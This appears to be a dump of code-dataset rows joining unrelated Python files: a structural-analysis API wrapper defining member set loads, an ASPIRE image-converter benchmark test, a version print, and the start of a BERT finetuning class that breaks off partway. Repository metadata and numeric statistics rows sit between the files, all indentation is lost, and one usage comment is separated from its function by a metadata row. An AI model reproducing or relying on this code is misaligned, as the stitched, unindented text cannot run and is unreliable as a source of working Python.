load_type = MemberSetLoadType.LOAD_TYPE_ROTATION
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
try:
len(load_parameter) == 3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[2]
else:
clientObject.distance_a_absolute = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
try:
len(load_parameter) == 5
except:
raise Exception("WARNING: Load parameter array length should be 5 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[3]
else:
clientObject.distance_a_absolute = load_parameter[3]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[4]
else:
clientObject.distance_b_absolute = load_parameter[4]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
try:
len(load_parameter) == 7
except:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_2x2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
clientObject.distance_c_is_defined_as_relative = load_parameter[3]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
if load_parameter[3]:
clientObject.distance_c_relative = load_parameter[6]
else:
clientObject.distance_c_absolute = load_parameter[6]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
try:
len(load_parameter) == 6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter) == 6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter) == 6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter) == 3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
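# Rotation sketch with a parabolic distribution (instance name and the three hypothetical
# magnitudes, here rotations about local z, are assumptions):
#   msl.Rotation(no=8, load_case_no=1, member_sets='1',
#       load_distribution=MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC,
#       load_parameter=[0.01, 0.02, 0.01])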
def PipeContentFull(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction_orientation = MemberSetLoadDirectionOrientation.LOAD_DIRECTION_FORWARD,
specific_weight : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction_orientation (enum): Load Direction Orientation Enumeration
specific_weight (float): Specific Weight
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PIPE_CONTENT_FULL
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = MemberSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE.name
#Member Load Orientation
clientObject.load_direction_orientation = load_direction_orientation.name
#Load Magnitude
clientObject.magnitude = specific_weight
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
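# PipeContentFull always acts in global Z; only the content's specific weight is required.
# A sketch with assumed instance name and value:
#   msl.PipeContentFull(no=9, load_case_no=1, member_sets='1', specific_weight=10000)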
def PipeContentPartial(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction_orientation = MemberSetLoadDirectionOrientation.LOAD_DIRECTION_FORWARD,
specific_weight : float = 0.0,
filling_height : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction_orientation (enum): Load Direction Orientation Enumeration
specific_weight (float): Specific Weight
filling_height (float): Filling Height
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PIPE_CONTENT_PARTIAL
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = MemberSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE.name
#Member Load Orientation
clientObject.load_direction_orientation = load_direction_orientation.name
#Load Magnitude
clientObject.magnitude = specific_weight
#Filling Height
clientObject.filling_height = filling_height
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
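# PipeContentPartial additionally takes the filling height of the pipe (assumed values):
#   msl.PipeContentPartial(no=10, load_case_no=1, member_sets='1',
#       specific_weight=10000, filling_height=0.3)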
def PipeInternalPressure(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
pressure : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
pressure (float): Pressure
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PIPE_INTERNAL_PRESSURE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X.name
#Load Magnitude
clientObject.magnitude = pressure
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
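# PipeInternalPressure is a single uniform pressure acting along local x (hypothetical value):
#   msl.PipeInternalPressure(no=11, load_case_no=1, member_sets='1', pressure=200000)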
def RotaryMotion(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
angular_acceleration : float = 0.0,
angular_velocity : float = 0.0,
axis_definition_type = MemberSetLoadAxisDefinitionType.AXIS_DEFINITION_TWO_POINTS,
axis_orientation = MemberSetLoadAxisDefinitionAxisOrientation.AXIS_POSITIVE,
axis_definition = MemberSetLoadAxisDefinition.AXIS_X,
axis_definition_p1 = [],
axis_definition_p2 = [],
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
angular_acceleration (float): Angular Acceleration
angular_velocity (float): Angular Velocity
axis_definition_type (enum): Axis Definition Type Enumeration
axis_orientation (enum): Axis Orientation Enumeration
axis_definition (enum): Axis Definition Enumeration
axis_definition_p1 (list): Axis Definition First Point
axis_definition_p2 (list): Axis Definition Second Point
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_ROTARY_MOTION
clientObject.load_type = load_type.name
#Angular Acceleration
clientObject.angular_acceleration = angular_acceleration
#Angular Velocity
clientObject.angular_velocity = angular_velocity
#Axis Definition Type
clientObject.axis_definition_type = axis_definition_type.name
#Axis definition
if axis_definition_type.name == MemberSetLoadAxisDefinitionType.AXIS_DEFINITION_TWO_POINTS.name:
clientObject.axis_definition_p1_x = axis_definition_p1[0]
clientObject.axis_definition_p1_y = axis_definition_p1[1]
clientObject.axis_definition_p1_z = axis_definition_p1[2]
clientObject.axis_definition_p2_x = axis_definition_p2[0]
clientObject.axis_definition_p2_y = axis_definition_p2[1]
clientObject.axis_definition_p2_z = axis_definition_p2[2]
elif axis_definition_type.name == MemberSetLoadAxisDefinitionType.AXIS_DEFINITION_POINT_AND_AXIS.name:
clientObject.axis_definition_p1_x = axis_definition_p1[0]
clientObject.axis_definition_p1_y = axis_definition_p1[1]
clientObject.axis_definition_p1_z = axis_definition_p1[2]
clientObject.axis_definition_axis = axis_definition.name
clientObject.axis_definition_axis_orientation = axis_orientation.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject) | 47.55575 | 278 | 0.636401 | 11,387 | 108,760 | 5.762888 | 0.021077 | 0.118863 | 0.035842 | 0.027796 | 0.95916 | 0.955518 | 0.949758 | 0.941346 | 0.937475 | 0.922892 | 0 | 0.013969 | 0.299641 | 108,760 | 2,287 | 279 | 47.55575 | 0.84754 | 0.200717 | 0 | 0.910598 | 0 | 0 | 0.139522 | 0.052337 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011536 | false | 0.007931 | 0.001442 | 0 | 0.013699 | 0.009373 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
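# RotaryMotion sketch with an axis defined by two points (instance name and all coordinates
# are assumptions):
#   msl.RotaryMotion(no=12, load_case_no=1, member_sets='1',
#       angular_acceleration=1.0, angular_velocity=2.5,
#       axis_definition_type=MemberSetLoadAxisDefinitionType.AXIS_DEFINITION_TWO_POINTS,
#       axis_definition_p1=[0, 0, 0], axis_definition_p2=[0, 0, 1])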
9ceb23e87249c8e7891a32d92bff3f3fc9d97d3c | 6,721 | py | Python | src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/test.py | janden/ASPIRE-Python | 5bcf831881fd0e42630c3b99671c5ed08de260ea | [
"MIT"
] | null | null | null | src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/test.py | janden/ASPIRE-Python | 5bcf831881fd0e42630c3b99671c5ed08de260ea | [
"MIT"
] | null | null | null | src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/test.py | janden/ASPIRE-Python | 5bcf831881fd0e42630c3b99671c5ed08de260ea | [
"MIT"
] | null | null | null | import numpy as np
from ConverterModel.Converter import Converter
from scipy.misc import imresize
import time
import os
def test():
data_path = os.path.join('test_data', 'example_data_np_array.npy')
images = np.load(data_path)
num_images = images.shape[2]
bandlimit_ratio = 1.0
truncation_parameter = 1
resolutions = [64]
images_multiplier = 100
n = images_multiplier * num_images
for resolution in resolutions:
# testing with odd grid
scaled_images = np.zeros((2 * resolution + 1, 2 * resolution + 1, num_images))
for j in range(num_images):
scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution + 1, 2 * resolution + 1))
scaled_images = np.repeat(scaled_images, images_multiplier, axis=2)
print("testing images of size {}\n".format(scaled_images.shape[0]))
# initializing models
tic1 = time.clock()
converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio)
tic2 = time.clock()
converter.init_fast()
tic3 = time.clock()
converter.init_direct()
tic4 = time.clock()
print("finished initializing PSWF2D in {}".format(tic2 - tic1))
print("finished initializing FastModel in {}".format(tic3 - tic2))
print("finished initializing DirectModel in {}\n".format(tic4 - tic3))
# forwarding images
tic = time.clock()
coefficients_fast = converter.fast_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t/n
print("finished fast forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
tic = time.clock()
coefficients_direct = converter.direct_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t/n
print("finished direct forwarding {} images in {} seconds, average of {} seconds per image\n".format(n, t, tpi))
# test if coefficients are the same
print("Maximum absolute difference between coefficients is {}\n".format(np.max(np.absolute(coefficients_fast - coefficients_direct))))
# test reconstruction error
tic = time.clock()
reconstructed_images_direct = converter.direct_backward(coefficients_direct)
reconstructed_images_fast = converter.direct_backward(coefficients_fast)
toc = time.clock()
t = toc - tic
tpi = t / (2 * n)
print("finished backward of {} images in {} seconds, average of {} seconds per image\n".format(2 * n, t, tpi))
x_1d_grid = range(-resolution, resolution + 1)
x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid)
r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid))
points_inside_the_circle = r_2d_grid <= resolution
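# The errors reported below are relative mean-squared reconstruction errors restricted to the
# disc of radius `resolution`: the sum over that disc of the per-pixel mean (over the image
# stack) of |reconstruction - image|^2, divided by the same sum of |image|^2.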
err_slow = reconstructed_images_direct - scaled_images
e_slow = np.mean(np.square(np.absolute(err_slow)), axis=2)
e_slow = np.sum(e_slow[points_inside_the_circle])
err_fast = reconstructed_images_fast - scaled_images
e_fast = np.mean(np.square(np.absolute(err_fast)), axis=2)
e_fast = np.sum(e_fast[points_inside_the_circle])
p = np.mean(np.square(np.absolute(scaled_images)), axis=2)
p = np.sum(p[points_inside_the_circle])
print("odd images with resolution {} fast coefficients reconstructed error: {}".format(resolution, e_fast / p))
print("odd images with resolution {} direct coefficients reconstructed error: {}\n".format(resolution, e_slow / p))
# testing with even grid
scaled_images = np.zeros((2 * resolution, 2 * resolution, num_images))
for j in range(num_images):
scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution, 2 * resolution))
scaled_images = np.repeat(scaled_images, images_multiplier, axis=2)
print("testing images of size {}\n".format(scaled_images.shape[0]))
# initializing models
tic1 = time.clock()
converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio)
tic2 = time.clock()
converter.init_fast()
tic3 = time.clock()
converter.init_direct()
tic4 = time.clock()
print("finished initializing PSWF2D in {}".format(tic2 - tic1))
print("finished initializing FastModel in {}".format(tic3 - tic2))
print("finished initializing DirectModel in {}\n".format(tic4 - tic3))
# forwarding images
tic = time.clock()
coefficients_fast = converter.fast_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t / n
print("finished fast forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
tic = time.clock()
coefficients_direct = converter.direct_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t / n
print("finished direct forwarding {} images in {} seconds, average of {} seconds per image\n".format(n, t, tpi))
# test if coefficients are the same
print("Maximum absolute difference between coefficients is {}\n".format(np.max(np.absolute(coefficients_fast - coefficients_direct))))
# test reconstruction error
tic = time.clock()
reconstructed_images_direct = converter.direct_backward(coefficients_direct)
reconstructed_images_fast = converter.direct_backward(coefficients_fast)
toc = time.clock()
t = toc - tic
tpi = t / (2 * n)
print("finished backward of {} images in {} seconds, average of {} seconds per image\n".format(2 * n, t, tpi))
x_1d_grid = range(-resolution, resolution)
x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid)
r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid))
points_inside_the_circle = r_2d_grid <= resolution
err_slow = reconstructed_images_direct - scaled_images
e_slow = np.mean(np.square(np.absolute(err_slow)), axis=2)
e_slow = np.sum(e_slow[points_inside_the_circle])
err_fast = reconstructed_images_fast - scaled_images
e_fast = np.mean(np.square(np.absolute(err_fast)), axis=2)
e_fast = np.sum(e_fast[points_inside_the_circle])
p = np.mean(np.square(np.absolute(scaled_images)), axis=2)
p = np.sum(p[points_inside_the_circle])
print("even images with resolution {} fast coefficients reconstructed error: {}".format(resolution, e_fast / p))
print("even images with resolution {} direct coefficients reconstructed error: {}\n".format(resolution, e_slow / p))
test()
| 43.642857 | 142 | 0.652433 | 873 | 6,721 | 4.83047 | 0.127148 | 0.062604 | 0.028456 | 0.039839 | 0.911548 | 0.908229 | 0.902063 | 0.885938 | 0.885938 | 0.885938 | 0 | 0.015181 | 0.23553 | 6,721 | 153 | 143 | 43.928105 | 0.805566 | 0.035709 | 0 | 0.77193 | 0 | 0 | 0.186708 | 0.003864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008772 | false | 0 | 0.04386 | 0 | 0.052632 | 0.175439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1413c46fc707943afd71728d3671c25052a801be | 16 | py | Python | main.py | lukeyeager/github-testing | 03cadc83d4587bf0c4787e4a308056019aa8d6f6 | [
"MIT"
] | null | null | null | main.py | lukeyeager/github-testing | 03cadc83d4587bf0c4787e4a308056019aa8d6f6 | [
"MIT"
] | 10 | 2015-07-07T23:39:54.000Z | 2016-08-30T23:40:38.000Z | main.py | lukeyeager/github-testing | 03cadc83d4587bf0c4787e4a308056019aa8d6f6 | [
"MIT"
] | null | null | null | print('10.1.0')
| 8 | 15 | 0.5625 | 4 | 16 | 2.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 0.0625 | 16 | 1 | 16 | 16 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
14946f08002b0427fded5f5eed961e9123e8a523 | 32,765 | py | Python | bert/models/bert/bert.py | fanshiqing/DAPPLE | b2d2ceda90f6033b316f672ec05f45123234f130 | [
"BSD-3-Clause"
] | 50 | 2020-02-02T09:24:44.000Z | 2022-03-01T03:22:19.000Z | bert/models/bert/bert.py | fanshiqing/DAPPLE | b2d2ceda90f6033b316f672ec05f45123234f130 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T03:50:02.000Z | 2020-02-04T04:41:37.000Z | bert/models/bert/bert.py | AlibabaPAI/DAPPLE | fd75dcfbc6c73a7624b9fd9d8c3334e5d04bcd20 | [
"BSD-3-Clause"
] | 9 | 2020-02-02T09:23:31.000Z | 2021-09-22T07:24:34.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from models.bert import modeling
from models.bert import modeling_slice
import tensorflow as tf
from tensorflow import logging
import sys
slim = tf.contrib.slim
def gather_indexes(sequence_tensor, positions):
"""Gathers the vectors at the specific positions over a minibatch."""
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
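# Worked example (shapes are illustrative assumptions): with batch_size=2, seq_length=4,
# width=8 and positions=[[1, 3], [0, 2]], the flat offsets are [0, 4], the flattened
# positions become [1, 3, 4, 6], and the result is a [4, 8] tensor holding the hidden
# vectors of those four tokens in (batch, position) order.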
def bert_arg_scope(
weight_decay=0.00004,
batch_norm_decay=0.9997,
batch_norm_epsilon=0.001,
activation_fn=tf.nn.relu,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
"""Returns the scope with the default parameters.
Args:
weight_decay: the weight decay for weights variables.
batch_norm_decay: decay for the moving average of batch_norm momentums.
batch_norm_epsilon: small float added to variance to avoid dividing by zero.
activation_fn: Activation function for conv2d.
batch_norm_updates_collections: Collection for the update ops for
batch norm.
Returns:
    an arg_scope with the parameters.
"""
# Set weight_decay for weights in conv2d and fully_connected layers.
with slim.arg_scope([slim.conv2d, slim.fully_connected],
weights_regularizer=slim.l2_regularizer(weight_decay),
biases_regularizer=slim.l2_regularizer(weight_decay)):
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'updates_collections': batch_norm_updates_collections,
'fused': None, # Use fused batch norm if possible.
}
# Set activation_fn and parameters for batch_norm.
with slim.arg_scope([slim.conv2d], activation_fn=activation_fn,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params) as scope:
return scope
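# Hedged usage sketch (assumed, not taken from the original repo): the returned
# scope is meant to be re-entered around model construction, e.g.
#   with slim.arg_scope(bert_arg_scope(weight_decay=1e-4)):
#       net = slim.conv2d(images, 64, [3, 3], scope='conv1')
# so that layers created inside it pick up the shared regularizer and batch-norm
# settings defined above.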
class BertFinetune(object):
"""
  Finetune method based on BERT.
"""
def __init__(self, bert_config_file, max_seq_length, is_training,
input_ids, input_mask, segment_ids, labels, use_one_hot_embeddings,
model_type='classification', kwargs=None):
bert_config = modeling.BertConfig.from_json_file(bert_config_file)
if max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(max_seq_length, bert_config.max_position_embeddings))
self.model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
self.bert_config = bert_config
self.kwargs = kwargs
self.labels = labels
self.input_ids = input_ids
if model_type == 'classification':
self.build_output_layer_classification()
elif model_type == 'regression':
self.build_output_layer_regression()
elif model_type == 'mrc':
self.build_output_layer_squad()
elif model_type == 'pretrain':
self.build_pretrain()
else:
raise ValueError("model_type should be one of ['classification', "
"'regression', pretrain', 'mrc'].")
self.saver = tf.train.Saver(
var_list=tf.global_variables(),
max_to_keep=2)
def restore(self, saver_directory, sess):
checkpoint = tf.train.latest_checkpoint(saver_directory)
if not checkpoint:
logging.info("Couldn't find trained model at %s." % saver_directory)
else:
logging.info('restore from {}'.format(checkpoint))
self.saver.restore(sess, checkpoint)
def save(self, saver_directory, sess, step=None):
logging.info("Save to %s." % saver_directory)
if step is not None:
self.saver.save(sess, saver_directory, global_step=step)
else:
self.saver.save(sess, saver_directory)
def build_pretrain(self):
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = self.get_masked_lm_output(
self.bert_config,
self.model.get_sequence_output(),
self.model.get_embedding_table(),
self.kwargs['masked_lm_positions'],
self.kwargs['masked_lm_ids'],
self.kwargs['masked_lm_weights'])
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = self.get_next_sentence_output(
self.bert_config,
self.model.get_pooled_output(),
self.kwargs['next_sentence_labels'])
self.loss = masked_lm_loss + next_sentence_loss
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(self.kwargs['masked_lm_ids'], [-1])
masked_lm_weights = tf.reshape(self.kwargs['masked_lm_weights'], [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(self.kwargs['next_sentence_labels'], [-1])
